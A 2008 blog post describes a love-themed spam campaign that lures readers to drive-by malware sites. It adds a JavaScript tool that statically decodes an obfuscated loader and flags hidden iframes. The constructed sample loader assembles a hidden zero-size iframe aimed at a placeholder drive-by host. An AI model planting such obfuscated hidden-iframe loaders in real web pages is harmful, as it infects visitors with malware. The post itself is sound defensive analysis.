A Dispatch


July 02, 2008

Love Hurts Even More

Back in May, my blog entry Love Hurts told the quick story of a Storm-like email message that tried to lure victims to a site that automatically downloaded an executable Windows program. A month later, a new wave of such messages started flowing, but the destination at the end of the email links is far more insidious.

As before, the message Subject: lines, while all in a romantic vein, are all over the place. Here is a sampling of ones I've seen:

  • Can't stay away from you
  • Lucky to have you
  • My heart belongs to you
  • I want to be with you
  • I Wanna Be With You
  • Crazy in love with you
  • Lost In Love
  • For you...Sweetheart!
  • You make my world beautiful
  • My heart beats just for you
  • I'll Still Love You More
  • Love me tender, love me true

Ugh. I'm getting that bad taste one gets from having eaten one-too-many of those chalky candy hearts with ooey-gooey phrases on them. "I Wuv You."

Message bodies continue the one-sentence theme employed not only by a lot of recent malware lures but also by the medz and knockoff brand-name goods spammers who use the same address lists. I'd repeat some of the message bodies here, but reciting too many lines in the spirit of "Missing you with every breath" will make me vomit.

What these messages want you to do is visit the URLs at the end of the sickly sweet lines. Some email clients turn anything they recognize as a URL into a clickable link, unfortunately making it easier to go in search of your untrue love. The URLs point to a bunch of plain-language .com domain names, such as makinglovedirect.com (suspended the last time I checked).

Visiting any of those sites with an unpatched Internet Explorer could land you in a world of hurt. If you ever see the following page, it could be too late for you:

[Screenshot: the drive-by malware loading page.]

No, I really wasn't the lucky 10,000th visitor. Everyone is the lucky 10,000th visitor. Just as I've written that the assertion "this is not spam" means that it's spam, the assertion that "this is not a joke" means that it's a joke.

Although the two visible downloads require clicking either the image or the "click here" link, there is an unseen iframe element that automatically targets numerous vulnerabilities. The malware distributor uses obfuscated JavaScript to make the initial delivery. Because I've been a JavaScript nut since before Day One, I spent some time deconstructing the delivery mechanism of this iframe. Rather than bore non-scripting blog readers with the gory details, I've created a separate document that shows my findings. You can download the 374KB PDF file here (Creative Commons licensed).
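For readers who do want a taste of the scripting side, here is an added example of the kind of analysis that deconstruction involves. It is not code from the original post, from the PDF, or from the malware campaign itself, and it does not reproduce that campaign's actual obfuscation. It assumes a loader that stacks the three string encodings such pages commonly use (String.fromCharCode, the legacy unescape() with %XX sequences, and "\xNN" escapes in literals) before feeding the result to document.write(). The sample script, its variable names and the host drive-by.example.invalid are constructed placeholders. The emulator decodes the sample statically; nothing in it is ever executed.

```javascript
// Added example (not the post's code, not the campaign's): a static emulator for the
// string-building layer of an obfuscated drive-by loader, plus a check for the hidden
// <iframe> it assembles. The sample script and drive-by.example.invalid are constructed
// placeholders; the sample is only decoded, never executed.
const SAMPLE_SCRIPT = String.raw`var a = String.fromCharCode(60,105,102,114,97,109,101,32);
var b = unescape("%73%72%63%3D%22http%3A%2F%2Fdrive-by.example.invalid%2Floader.html%22%20");
var c = "\x77\x69\x64\x74\x68\x3d\x30 height=0 style=\"visibility:hidden\"></iframe>";
document.write(a + b + c);`;
// Split on ';' and newlines, but never inside a quoted string literal.
function splitStatements(src) {
  const out = [], push = s => { if (s.trim()) out.push(s.trim()); };
  let cur = '', quote = null;
  for (let i = 0; i < src.length; i++) {
    const ch = src[i];
    if (quote) { cur += ch; if (ch === '\\') cur += src[++i] ?? ''; else if (ch === quote) quote = null; }
    else if (ch === '"' || ch === "'") { quote = ch; cur += ch; }
    else if (ch === ';' || ch === '\n') { push(cur); cur = ''; }
    else cur += ch;
  }
  push(cur);
  return out;
}
// "\xNN", "\uNNNN" and simple backslash escapes inside a literal body.
const SIMPLE = { n: '\n', r: '\r', t: '\t', '0': '\0' };
const unescapeLiteral = body => body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)/g,
  (_, e) => e.length > 1 ? String.fromCharCode(parseInt(e.slice(1), 16)) : (SIMPLE[e] ?? e));
// The legacy unescape() function: %XX and %uXXXX back to characters.
const legacyUnescape = s => s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
  (_, u, x) => String.fromCharCode(parseInt(u ?? x, 16)));

// Recursive-descent evaluator for the grammar these loaders use:
//   expr := term ('+' term)*   term := "literal" | ident | String.fromCharCode(n,...) | unescape(expr)
function evalExpr(expr, vars) {
  let pos = 0;
  const take = re => {                      // match re at the cursor after skipping whitespace
    while (pos < expr.length && /\s/.test(expr[pos])) pos++;
    const m = re.exec(expr.slice(pos));
    if (m) pos += m[0].length;
    return m;
  };
  function term() {
    let m;
    if (take(/^String\.fromCharCode\s*\(/)) {
      const close = expr.indexOf(')', pos);
      if (close < 0) throw new Error('unterminated fromCharCode');
      const codes = expr.slice(pos, close).split(',').filter(s => s.trim()).map(s => parseInt(s, 10));
      pos = close + 1;
      return String.fromCharCode(...codes);
    }
    if (take(/^unescape\s*\(/)) {
      const inner = concat();
      if (!take(/^\)/)) throw new Error('unterminated unescape');
      return legacyUnescape(inner);
    }
    if ((m = take(/^"((?:[^"\\]|\\.)*)"|^'((?:[^'\\]|\\.)*)'/))) return unescapeLiteral(m[1] ?? m[2]);
    if ((m = take(/^[A-Za-z_$][\w$]*/))) {
      if (!vars.has(m[0])) throw new Error(`unknown identifier ${m[0]}`);
      return vars.get(m[0]);
    }
    throw new Error(`unsupported syntax near: ${expr.slice(pos, pos + 20)}`);
  }
  function concat() {
    let v = term();
    while (take(/^\+/)) v += term();
    return v;
  }
  const v = concat();
  if (!take(/^$/)) throw new Error(`trailing syntax near: ${expr.slice(pos, pos + 20)}`);
  return v;
}

// Track assignments and collect what would reach document.write(). Anything else
// (eval, functions, loops) is reported, not run, so the analyst knows a layer remains.
function emulateWrites(script) {
  const vars = new Map(), written = [], unhandled = [];
  for (const stmt of splitStatements(script)) {
    let m;
    try {
      if ((m = /^(?:var\s+)?([A-Za-z_$][\w$]*)\s*=(?!=)\s*([\s\S]+)$/.exec(stmt))) vars.set(m[1], evalExpr(m[2], vars));
      else if ((m = /^document\.write(?:ln)?\s*\(([\s\S]*)\)$/.exec(stmt))) written.push(evalExpr(m[1], vars));
      else unhandled.push(stmt);
    } catch (e) { unhandled.push(`${stmt}  <-- ${e.message}`); }
  }
  return { html: written.join(''), unhandled };
}
// Flag iframes the browser would load but the visitor would never see.
function findHiddenIframes(html) {
  const found = [], tagRe = /<iframe\b([^>]*)>/gi;
  for (let t; (t = tagRe.exec(html));) {
    const attrs = {}, attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
    for (let a; (a = attrRe.exec(t[1]));) attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    const tiny = ['width', 'height'].some(k => k in attrs && parseInt(attrs[k], 10) <= 1);
    const styled = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(attrs.style || '');
    found.push({ src: attrs.src || '', width: attrs.width, height: attrs.height, hidden: tiny || styled });
  }
  return found;
}
function analyze(script) { const r = emulateWrites(script); return { ...r, iframes: findHiddenIframes(r.html) }; }
console.log(JSON.stringify(analyze(SAMPLE_SCRIPT), null, 2));
```

Run it with node and it prints the reassembled `<iframe ...>` tag, the iframe flagged as hidden with its src, and an empty `unhandled` list. On a real sample the `unhandled` list is the important part: anything the emulator would not evaluate (an eval() call, a function that decodes a second payload) is another obfuscation layer, and the right move is to decode that layer the same way rather than run the script in a browser to see what it does.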

Almost all of us want to be wanted and loved. Malware distributors exploit that desire by making us believe we have secret admirers and might even get lucky with the right connection. With this malware campaign, you won't get laid, but you might well be screwed.

Posted on July 02, 2008 at 09:23 AM